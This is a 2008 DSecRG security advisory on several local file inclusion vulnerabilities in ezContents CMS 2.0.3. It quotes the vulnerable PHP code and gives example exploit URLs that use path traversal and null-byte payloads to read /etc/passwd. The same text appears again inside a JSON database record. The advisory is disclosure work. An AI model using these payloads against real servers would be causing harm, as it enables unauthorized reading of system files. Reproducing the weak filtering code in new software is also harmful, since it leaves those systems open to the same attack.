Description
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-038
Application: ezContents CMS
Versions Affected: 2.0.3
Application URL: http://www.ezcontents.org/
Vendor URL: http://www.visualshapers.com/
Bug: Multiple Local File Include
Exploits: YES
Reported: 05.08.2008
Second report: 18.08.2008
Vendor Response: NONE
Solution: NONE
Date of Public Advisory: 25.08.2008
Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
Description
***********
ezContents CMS has Multiple Local File Include vulnerabilities.
Details
*******
1. Local File Include vulnerability found in script /module.php
Vulnerable GET parameter "link".
First discovered by Zero_X [http://secunia.com/advisories/10604/].
Vendor fixed vulnerability in version 2.0.3 by adding verification for this parameter.
However, attacker still can include local files.
Code [line 32-42, 141-145]
--------------------------
#################################################
$GLOBALS["rootdp"] = './';
require_once ($GLOBALS["rootdp"]."include/config.php");
require_once ($GLOBALS["rootdp"]."include/db.php");
require_once ($GLOBALS["rootdp"]."include/session.php");
include_once ($GLOBALS["rootdp"].$GLOBALS["modules_home"]."modfunctions.php");
if ((!isset($HTTP_GET_VARS["ezSID"])) && (isset($HTTP_POST_VARS["ezSID"]))) $HTTP_GET_VARS["ezSID"] =
$HTTP_POST_VARS["ezSID"];
if ((!isset($HTTP_GET_VARS["link"])) && (isset($HTTP_POST_VARS["link"]))) $HTTP_GET_VARS["link"] =
$HTTP_POST_VARS["link"];
$HTTP_GET_VARS["link"] = str_replace('../', '', $HTTP_GET_VARS["link"]);
...
if (isExternalLink ($HTTP_GET_VARS["link"])) {
ECHO 'Remote Code Execution Patch Installed on this implementation of ezContents';
} else {
include($GLOBALS["rootdp"].$HTTP_GET_VARS["link"]);
}
#################################################
isExternalLink() function in script /include/functions.php checks for remote inclusion attempts.
Code [line 768-779]
-------------------
#################################################
function isExternalLink ($linkref)
{
if ( (substr($linkref,0,5) == 'http:') || (substr($linkref,0,6) == 'https:') ||
(substr($linkref,0,5) == 'file:') || (substr($linkref,0,4) == 'ftp:')
||
(substr($linkref,0,7) == 'gopher:') || (substr($linkref,0,7) == 'mailto:') ||
(substr($linkref,0,5) == 'news:') || (substr($linkref,0,7) ==
'telnet:') ||
(substr($linkref,0,5) == 'wais:') ) {
return True;
} else {
return False;
}
} // isExternalLink
#################################################
Example:
http://[server]/[installdir]/module.php?link=....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
2. Local File Include vulnerabilities found in scripts
/modules/diary/showdiary.php
/modules/diary/showeventlist.php
/modules/gallery/showgallery.php
/modules/reviews/showreviews.php
Successful exploitation requires that "register_globals" is enabled.
Code [showdiary.php, line 32-45]
--------------------------------
#################################################
global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
(substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
(substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
require_once('./modules/moduleSec.php');
} else {
require_once('../moduleSec.php');
}
$GLOBALS["ModuleName"] = 'diary';
if (!isset($GLOBALS["gsLanguage"])) { Header("Location:
".$GLOBALS["rootdp"]."module.php?link=".$GLOBALS["modules_home"].$GLOBALS["ModuleRef"]."/showdiary.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");
#################################################
Script /modules/moduleSec.php checks for inclusion attempts.
Code
----
#################################################
function moduleExternalLink ($linkref)
{
if ($linkref != '') {
if ( (substr($linkref,0,5) == 'http:') || (substr($linkref,0,6) == 'https:')
||
(substr($linkref,0,5) == 'file:') || (substr($linkref,0,4) ==
'ftp:') ||
(substr($linkref,0,7) == 'gopher:') || (substr($linkref,0,7) ==
'mailto:') ||
(substr($linkref,0,5) == 'news:') || (substr($linkref,0,7) ==
'telnet:') ||
(substr($linkref,0,5) == 'wais:') ) {
return True;
} else {
return False;
}
} else {
return False;
}
} // moduleExternalLink
if (!(isset($GLOBALS["rootdp"]))) {
ECHO 'Remote Code Execution Patch Installed on this implementation of ezContents';
DIE;
}
if ( (moduleExternalLink($GLOBALS["rootdp"])) || (moduleExternalLink($GLOBALS["modfiledir"])) ||
(moduleExternalLink($GLOBALS["modules_home"])) ||
(moduleExternalLink($GLOBALS["admin_home"])) ||
(moduleExternalLink($GLOBALS["language_home"])) ) {
ECHO 'Remote Code Execution Patch Installed on this implementation of ezContents';
DIE;
}
#################################################
Example:
http://[server]/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
3. Local File Include vulnerabilities found in scripts
/modules/diary/showdiarydetail.php
/modules/gallery/showgallerydetails.php
/modules/reviews/showreviewsdetails.php
/modules/news/shownewsdetails.php
Successful exploitation requires that "register_globals" is enabled.
Code [showdiarydetail.php, line 32-46]
--------------------------------------
#################################################
global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
(substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
(substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
require_once('./modules/moduleSec.php');
} else {
require_once('../moduleSec.php');
}
$GLOBALS["ModuleName"] = 'diary';
include_once ($GLOBALS["admin_home"]."compile.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");
#################################################
Example:
http://[server]/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&admin_home=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
4. Local File Include vulnerabilities found in scripts
/modules/diary/submit_diary.php
/modules/gallery/submit_gallery.php
/modules/guestbook/submit_guestbook.php
/modules/reviews/submit_reviews.php
/modules/news/submit_news.php
Successful exploitation requires that "register_globals" is enabled.
Code [submit_diary.php, line 32-51]
-----------------------------------
#################################################
global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
(substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
(substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
require_once('./modules/moduleSec.php');
} else {
require_once('../moduleSec.php');
}
// Localisation variables (used for default values)
// Change these to suit your site preferences
//
$expiryperiod = 'm'; // Time period to calculate the banner expiry date (based on
today's date)
$expirynumber = 1;
$GLOBALS["ModuleName"] = 'diary';
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");
#################################################
Example:
http://[server]/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
5. Local File Include vulnerabilities found in scripts
/modules/news/archivednews_summary.php
/modules/news/news_summary.php
Successful exploitation requires that "register_globals" is enabled.
Code [news_summary.php, line 32-41]
-----------------------------------
#################################################
global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
(substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
(substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
require_once('./modules/moduleSec.php');
} else {
require_once('../moduleSec.php');
}
include_once ($GLOBALS["admin_home"]."compile.php");
#################################################
Example:
http://[server]/[installdir]/modules/news/news_summary.php?rootdp=DSecRG&admin_home=../../../../../../../../../../../../../etc/passwd%00
6. Local File Include vulnerabilities found in scripts
/modules/diary/inlineeventlist.php
/modules/news/inlinenews.php
Successful exploitation requires that "register_globals" is enabled.
Code [inlinenews.php, line 32-52]
---------------------------------
#################################################
global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
(substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
(substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
require_once('./modules/moduleSec.php');
} else {
require_once('../moduleSec.php');
}
global $EZ_SESSION_VARS;
$GLOBALS["ModuleName"] = 'news';
$linkref = $nLink;
$chainlink = explode('/',$linkref);
$modfilename = array_pop($chainlink);
$GLOBALS["modfiledir"] = implode('/',$chainlink);
include($GLOBALS["modfiledir"]."/moduleref.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");
#################################################
Example:
http://[server]/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&nLink=../../../../../../../../../../../../../etc/passwd%00/
http://[server]/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
About
*****
Digital Security is leading IT security company in Russia, providing information security consulting,
audit and penetration testing services, risk analysis and ISMS-related services and certification for
ISO/IEC 27001:2005 and PCI DSS standards.
Digital Security Research Group focuses on web application and database security problems with
vulnerability reports, advisories and whitepapers posted regularly on our website.
Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
{"id": "SECURITYVULNS:DOC:20403", "bulletinFamily": "software", "title": "[DSECRG-08-038] Multiple Local File Include Vulnerabilities in ezContents CMS 2.0.3", "description": "\r\nDigital Security Research Group [DSecRG] Advisory #DSECRG-08-038\r\n\r\n\r\nApplication: ezContents CMS\r\nVersions Affected: 2.0.3\r\nApplication URL: http://www.ezcontents.org/\r\nVendor URL: http://www.visualshapers.com/\r\nBug: Multiple Local File Include\r\nExploits: YES\r\nReported: 05.08.2008\r\nSecond report: 18.08.2008\r\nVendor Response: NONE\r\nSolution: NONE\r\nDate of Public Advisory: 25.08.2008\r\nAuthor: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)\r\n\r\n\r\n\r\nDescription\r\n***********\r\n\r\nezContents CMS has Multiple Local File Include vulnerabilities. \r\n\r\n\r\n\r\nDetails\r\n*******\r\n\r\n1. Local File Include vulnerability found in script /module.php\r\n\r\nVulnerable GET parameter "link".\r\n\r\nFirst discovered by Zero_X [http://secunia.com/advisories/10604/].\r\nVendor fixed vulnerability in version 2.0.3 by adding verification for this parameter. \r\nHowever, attacker still can include local files.\r\n\r\nCode [line 32-42, 141-145]\r\n--------------------------\r\n#################################################\r\n\r\n$GLOBALS["rootdp"] = './';\r\nrequire_once ($GLOBALS["rootdp"]."include/config.php");\r\nrequire_once ($GLOBALS["rootdp"]."include/db.php");\r\nrequire_once ($GLOBALS["rootdp"]."include/session.php");\r\ninclude_once ($GLOBALS["rootdp"].$GLOBALS["modules_home"]."modfunctions.php");\r\n\r\n\r\nif ((!isset($HTTP_GET_VARS["ezSID"])) && (isset($HTTP_POST_VARS["ezSID"]))) $HTTP_GET_VARS["ezSID"] =\r\n$HTTP_POST_VARS["ezSID"];\r\nif ((!isset($HTTP_GET_VARS["link"])) && (isset($HTTP_POST_VARS["link"]))) $HTTP_GET_VARS["link"] =\r\n$HTTP_POST_VARS["link"];\r\n\r\n$HTTP_GET_VARS["link"] = str_replace('../', '', $HTTP_GET_VARS["link"]);\r\n\r\n...\r\n\r\nif (isExternalLink ($HTTP_GET_VARS["link"])) {\r\n ECHO 'Remote Code Execution Patch Installed on this implementation of ezContents';\r\n} else {\r\n include($GLOBALS["rootdp"].$HTTP_GET_VARS["link"]);\r\n}\r\n\r\n#################################################\r\n\r\nisExternalLink() function in script /include/functions.php checks for remote inclusion attempts. \r\n\r\nCode [line 768-779]\r\n-------------------\r\n#################################################\r\n\r\nfunction isExternalLink ($linkref)\r\n{\r\n if ( (substr($linkref,0,5) == 'http:') || (substr($linkref,0,6) == 'https:') ||\r\n (substr($linkref,0,5) == 'file:') || (substr($linkref,0,4) == 'ftp:') \r\n||\r\n (substr($linkref,0,7) == 'gopher:') || (substr($linkref,0,7) == 'mailto:') ||\r\n (substr($linkref,0,5) == 'news:') || (substr($linkref,0,7) ==\r\n'telnet:') ||\r\n (substr($linkref,0,5) == 'wais:') ) {\r\n return True;\r\n } else {\r\n return False;\r\n }\r\n} // isExternalLink\r\n\r\n#################################################\r\n\r\nExample:\r\n\r\nhttp://[server]/[installdir]/module.php?link=....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd\r\n\r\n\r\n2. Local File Include vulnerabilities found in scripts\r\n\r\n/modules/diary/showdiary.php\r\n/modules/diary/showeventlist.php\r\n/modules/gallery/showgallery.php\r\n/modules/reviews/showreviews.php\r\n\r\nSuccessful exploitation requires that "register_globals" is enabled.\r\n\r\nCode [showdiary.php, line 32-45]\r\n--------------------------------\r\n#################################################\r\n\r\nglobal $HTTP_SERVER_VARS;\r\nif ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||\r\n (substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||\r\n (substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {\r\n require_once('./modules/moduleSec.php');\r\n} else {\r\n require_once('../moduleSec.php');\r\n}\r\n\r\n$GLOBALS["ModuleName"] = 'diary';\r\n\r\nif (!isset($GLOBALS["gsLanguage"])) { Header("Location:\r\n".$GLOBALS["rootdp"]."module.php?link=".$GLOBALS["modules_home"].$GLOBALS["ModuleRef"]."/showdiary.php");\r\ninclude_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");\r\ninclude_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");\r\n\r\n#################################################\r\n\r\nScript /modules/moduleSec.php checks for inclusion attempts.\r\n\r\nCode\r\n----\r\n#################################################\r\n\r\nfunction moduleExternalLink ($linkref)\r\n{\r\n if ($linkref != '') {\r\n if ( (substr($linkref,0,5) == 'http:') || (substr($linkref,0,6) == 'https:')\r\n||\r\n (substr($linkref,0,5) == 'file:') || (substr($linkref,0,4) ==\r\n'ftp:') ||\r\n (substr($linkref,0,7) == 'gopher:') || (substr($linkref,0,7) ==\r\n'mailto:') ||\r\n (substr($linkref,0,5) == 'news:') || (substr($linkref,0,7) ==\r\n'telnet:') ||\r\n (substr($linkref,0,5) == 'wais:') ) {\r\n return True;\r\n } else {\r\n return False;\r\n }\r\n } else {\r\n return False;\r\n }\r\n} // moduleExternalLink\r\n\r\n\r\nif (!(isset($GLOBALS["rootdp"]))) {\r\n ECHO 'Remote Code Execution Patch Installed on this implementation of ezContents';\r\n DIE;\r\n}\r\nif ( (moduleExternalLink($GLOBALS["rootdp"])) || (moduleExternalLink($GLOBALS["modfiledir"])) ||\r\n (moduleExternalLink($GLOBALS["modules_home"])) ||\r\n(moduleExternalLink($GLOBALS["admin_home"])) ||\r\n (moduleExternalLink($GLOBALS["language_home"])) ) {\r\n ECHO 'Remote Code Execution Patch Installed on this implementation of ezContents';\r\n DIE;\r\n}\r\n\r\n#################################################\r\n\r\nExample:\r\n\r\nhttp://[server]/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00\r\nhttp://[server]/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00\r\n\r\n\r\n3. Local File Include vulnerabilities found in scripts\r\n\r\n/modules/diary/showdiarydetail.php\r\n/modules/gallery/showgallerydetails.php\r\n/modules/reviews/showreviewsdetails.php\r\n/modules/news/shownewsdetails.php\r\n\r\nSuccessful exploitation requires that "register_globals" is enabled.\r\n\r\nCode [showdiarydetail.php, line 32-46]\r\n--------------------------------------\r\n#################################################\r\n\r\nglobal $HTTP_SERVER_VARS;\r\nif ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||\r\n (substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||\r\n (substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {\r\n require_once('./modules/moduleSec.php');\r\n} else {\r\n require_once('../moduleSec.php');\r\n}\r\n\r\n$GLOBALS["ModuleName"] = 'diary';\r\n\r\ninclude_once ($GLOBALS["admin_home"]."compile.php");\r\n\r\ninclude_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");\r\ninclude_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");\r\n\r\n#################################################\r\n\r\nExample:\r\n\r\nhttp://[server]/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&admin_home=../../../../../../../../../../../../../etc/passwd%00\r\nhttp://[server]/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00\r\nhttp://[server]/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00\r\n\r\n\r\n4. Local File Include vulnerabilities found in scripts\r\n\r\n/modules/diary/submit_diary.php\r\n/modules/gallery/submit_gallery.php\r\n/modules/guestbook/submit_guestbook.php\r\n/modules/reviews/submit_reviews.php\r\n/modules/news/submit_news.php\r\n\r\nSuccessful exploitation requires that "register_globals" is enabled.\r\n\r\nCode [submit_diary.php, line 32-51]\r\n-----------------------------------\r\n#################################################\r\n\r\nglobal $HTTP_SERVER_VARS;\r\nif ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||\r\n (substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||\r\n (substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {\r\n require_once('./modules/moduleSec.php');\r\n} else {\r\n require_once('../moduleSec.php');\r\n}\r\n\r\n// Localisation variables (used for default values)\r\n// Change these to suit your site preferences\r\n//\r\n$expiryperiod = 'm'; // Time period to calculate the banner expiry date (based on\r\ntoday's date)\r\n$expirynumber = 1;\r\n\r\n\r\n$GLOBALS["ModuleName"] = 'diary';\r\n\r\ninclude_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");\r\ninclude_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");\r\n\r\n#################################################\r\n\r\nExample:\r\n\r\nhttp://[server]/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00\r\nhttp://[server]/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00\r\n\r\n\r\n5. Local File Include vulnerabilities found in scripts\r\n\r\n/modules/news/archivednews_summary.php\r\n/modules/news/news_summary.php\r\n\r\nSuccessful exploitation requires that "register_globals" is enabled.\r\n\r\nCode [news_summary.php, line 32-41]\r\n-----------------------------------\r\n#################################################\r\n\r\nglobal $HTTP_SERVER_VARS;\r\nif ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||\r\n (substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||\r\n (substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {\r\n require_once('./modules/moduleSec.php');\r\n} else {\r\n require_once('../moduleSec.php');\r\n}\r\n\r\ninclude_once ($GLOBALS["admin_home"]."compile.php");\r\n\r\n#################################################\r\n\r\nExample:\r\n\r\nhttp://[server]/[installdir]/modules/news/news_summary.php?rootdp=DSecRG&admin_home=../../../../../../../../../../../../../etc/passwd%00\r\n\r\n\r\n6. Local File Include vulnerabilities found in scripts\r\n\r\n/modules/diary/inlineeventlist.php\r\n/modules/news/inlinenews.php\r\n\r\nSuccessful exploitation requires that "register_globals" is enabled.\r\n\r\nCode [inlinenews.php, line 32-52]\r\n---------------------------------\r\n#################################################\r\n\r\nglobal $HTTP_SERVER_VARS;\r\nif ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||\r\n (substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||\r\n (substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {\r\n require_once('./modules/moduleSec.php');\r\n} else {\r\n require_once('../moduleSec.php');\r\n}\r\n\r\nglobal $EZ_SESSION_VARS;\r\n\r\n$GLOBALS["ModuleName"] = 'news';\r\n\r\n$linkref = $nLink;\r\n$chainlink = explode('/',$linkref);\r\n$modfilename = array_pop($chainlink);\r\n$GLOBALS["modfiledir"] = implode('/',$chainlink);\r\ninclude($GLOBALS["modfiledir"]."/moduleref.php");\r\n\r\ninclude_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");\r\ninclude_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");\r\n\r\n#################################################\r\n\r\nExample:\r\n\r\nhttp://[server]/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&nLink=../../../../../../../../../../../../../etc/passwd%00/\r\nhttp://[server]/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00\r\nhttp://[server]/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00\r\n\r\n\r\n\r\nAbout\r\n*****\r\n\r\nDigital Security is leading IT security company in Russia, providing information security consulting,\r\naudit and penetration testing services, risk analysis and ISMS-related services and certification for\r\nISO/IEC 27001:2005 and PCI DSS standards.\r\nDigital Security Research Group focuses on web application and database security problems with\r\nvulnerability reports, advisories and whitepapers posted regularly on our website.\r\n\r\n\r\nContact: research [at] dsec [dot] ru\r\n http://www.dsec.ru (in Russian)\r\n", "published": "2008-08-26T00:00:00", "modified": "2008-08-26T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20403", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:27", "edition": 1, "viewCount": 136, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9244"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9244"]}]}, "exploitation": null, "vulnersScore": -0.1}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645518651, "score": 1659803227}, "_internal": {"score_hash": "0050398b178abc5a647e0e38ab3b085f"}}
{}